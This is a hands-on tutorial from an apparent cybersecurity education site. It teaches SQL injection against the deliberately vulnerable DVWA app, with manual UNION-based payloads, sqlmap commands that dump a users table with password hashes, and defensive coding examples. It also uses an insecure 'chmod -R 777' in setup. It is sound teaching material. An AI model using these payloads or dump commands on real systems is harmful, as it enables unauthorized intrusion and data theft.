SQL Injection Attack & Defense Lab: A Complete Hands-On Guide

By /

CyberlyTech | Cybersecurity Labs

๐Ÿ” CYBERSECURITY LAB #1

DifficultyIntermediate | Estimated Time: 3โ€“4 Hours
Tools UsedSQLMap, Burp Suite, DVWA, Kali Linux, MySQL
CategoryWeb Application Security | Penetration Testing

๐Ÿ“Œ Introduction

SQL Injection (SQLi) remains one of the most dangerous and widely exploited web application vulnerabilities in cybersecurity history. Listed in the OWASP Top 10 for over a decade, SQL Injection attacks allow malicious actors to manipulate database queries, bypass authentication mechanisms, extract sensitive data, and in severe cases โ€” gain full control of backend servers.

In this premium CyberlyTech hands-on lab, you will learn SQL Injection from the ground up: understanding how it works, practicing real attack techniques in a safe legal environment, and implementing robust defensive countermeasures. This lab is designed for aspiring ethical hackers, penetration testers, and security professionals preparing for certifications like CEH, OSCP, and CompTIA Security+.

Learn more about: https://cyberlytech.tech/how-to-learn-cybersecurity-2026/

๐ŸŽฏ Lab Objectives

  • Understand the fundamentals of SQL Injection vulnerability
  • Set up a legal, controlled vulnerable web environment (DVWA)
  • Perform manual SQL Injection attacks step by step
  • Use automated tools like SQLMap for advanced exploitation
  • Analyze HTTP requests with Burp Suite
  • Implement prevention techniques: prepared statements, WAF, input validation

โš™๏ธ Lab Environment Setup

Requirements

  • Kali Linux (VM or bare metal) โ€” Download: kali.org
  • DVWA (Damn Vulnerable Web Application)
  • XAMPP or Docker for hosting DVWA
  • Burp Suite Community Edition
  • SQLMap (pre-installed on Kali)

Step 1: Install DVWA on Kali Linux

Open your terminal and run the following commands:

sudo apt update && sudo apt upgrade -y

sudo apt install apache2 php php-mysqli mariadb-server -y

cd /var/www/html

sudo git clone https://github.com/digininja/DVWA.git

sudo chmod -R 777 DVWA/

sudo service apache2 start

sudo service mysql start

Step 2: Configure DVWA Database

Open browser and navigate to: http://localhost/DVWA/setup.php then click ‘Create / Reset Database’. Default credentials: admin / password. Set security level to LOW for this lab.

๐Ÿงช Lab Module 1: Understanding SQL Injection

How SQL Injection Works

When a web application constructs SQL queries using user-supplied input without proper sanitization, an attacker can inject malicious SQL code. Consider this vulnerable PHP code:

$query = “SELECT * FROM users WHERE id='” . $_GET[‘id’] . “‘”;

If a user inputs: 1′ OR ‘1’=’1 โ€” the query becomes:

SELECT * FROM users WHERE id=’1′ OR ‘1’=’1′

This always returns TRUE โ€” bypassing authentication and dumping all user records.

๐Ÿ› ๏ธ Lab Module 2: Manual SQL Injection Attack

Task 1: Basic Error-Based Injection

Navigate to DVWA > SQL Injection. Enter the following payloads one by one and observe the responses:

  1. Test for vulnerability: Enter ‘ (single quote) and observe SQL error
  2. Determine column count: Enter 1′ ORDER BY 1– (increment until error)
  3. Find output columns: Enter 1′ UNION SELECT NULL,NULL–
  4. Extract database version: Enter 1′ UNION SELECT @@version,NULL–
  5. Extract table names: Enter 1′ UNION SELECT table_name,NULL FROM information_schema.tables–

Expected Output

First name: 5.7.33-0ubuntu0.18.04.1

Surname: NULL

This confirms successful data extraction from the backend MySQL database.

๐Ÿค– Lab Module 3: Automated SQLMap Attack

Intercepting the Request with Burp Suite

1. Configure browser proxy to 127.0.0.1:8080. 2. Enable Burp Suite intercept. 3. Submit a form on DVWA SQL Injection page. 4. Save the intercepted request to a file: request.txt

Running SQLMap

sqlmap -r request.txt –dbs –batch

sqlmap -r request.txt -D dvwa –tables –batch

sqlmap -r request.txt -D dvwa -T users –dump –batch

SQLMap will automatically detect the injection point, test multiple techniques (UNION, Boolean-based, Time-based), and extract the complete users table including hashed passwords.

๐Ÿ” Lab Module 4: Defense & Prevention

1. Use Prepared Statements (Parameterized Queries)

$stmt = $pdo->prepare(‘SELECT * FROM users WHERE id = ?’);

$stmt->execute([$user_id]);

2. Input Validation & Whitelisting

$id = filter_var($_GET[‘id’], FILTER_VALIDATE_INT);

if ($id === false) { die(‘Invalid input’); }

3. Web Application Firewall (WAF)

Deploy a WAF like ModSecurity (Apache) or Cloudflare WAF to automatically block SQL injection patterns before they reach your application layer.

4. Least Privilege Database Accounts

Your web application’s database user should have only SELECT, INSERT, UPDATE permissions โ€” never DROP, ALTER, or EXECUTE to minimize damage from successful attacks.

๐Ÿ“Š SQL Injection Types โ€” Quick Reference

TypeDescriptionDetection Method
Classic/In-BandResults shown directly in responseUNION SELECT attacks
Blind BooleanNo visible output, different responsesTrue/False conditions
Time-Based BlindCauses DB to delay responseSLEEP() / WAITFOR DELAY

โœ… Conclusion

SQL Injection is a critical vulnerability that every security professional must understand deeply. In this lab, you progressed from understanding the fundamental mechanics of SQLi to performing real attacks using both manual techniques and automated tools like SQLMap. You also learned how to defend applications using parameterized queries, input validation, and WAFs.

Mastering SQL Injection is a cornerstone skill for CEH, OSCP, and Bug Bounty hunting. Practice these techniques in legal environments like HackTheBox, TryHackMe, and DVWA only. Always obtain written permission before testing any real systems.

Continue your journey with the next CyberlyTech labs covering XSS, CSRF, and Advanced Web Application Penetration Testing.

โ“ Frequently Asked Questions (FAQ)

Q1: Is SQL Injection still relevant in 2025?

Yes. Despite being one of the oldest web vulnerabilities, SQL Injection consistently appears in real-world breaches and penetration testing engagements. Thousands of applications remain vulnerable due to legacy codebases and improper development practices.

Q2: Can SQLMap bypass WAF protections?

SQLMap includes tamper scripts that can bypass some WAF implementations. However, enterprise-grade WAFs with behavioral analysis and machine learning are significantly harder to bypass. This is why defense-in-depth is critical.

Q3: What is the legal status of SQL injection testing?

SQL Injection testing is legal only with explicit written authorization from the system owner. Unauthorized testing constitutes a criminal offense under laws like the Computer Fraud and Abuse Act (CFAA) in the US and equivalent laws globally.

Q4: How do I practice SQL Injection safely?

Use dedicated vulnerable platforms: DVWA (local), HackTheBox, TryHackMe, PortSwigger Web Security Academy (free), and VulnHub machines. Never test on production systems without authorization.

Q5: Does using an ORM prevent SQL Injection?

ORMs (like SQLAlchemy, Hibernate) significantly reduce SQLi risk when used correctly. However, raw query methods and improper ORM usage can still introduce vulnerabilities. Security code reviews remain essential.

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”

ยฉ 2026 CyberlyTech โ€” cyberlytech.tech | Premium Cybersecurity Education

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top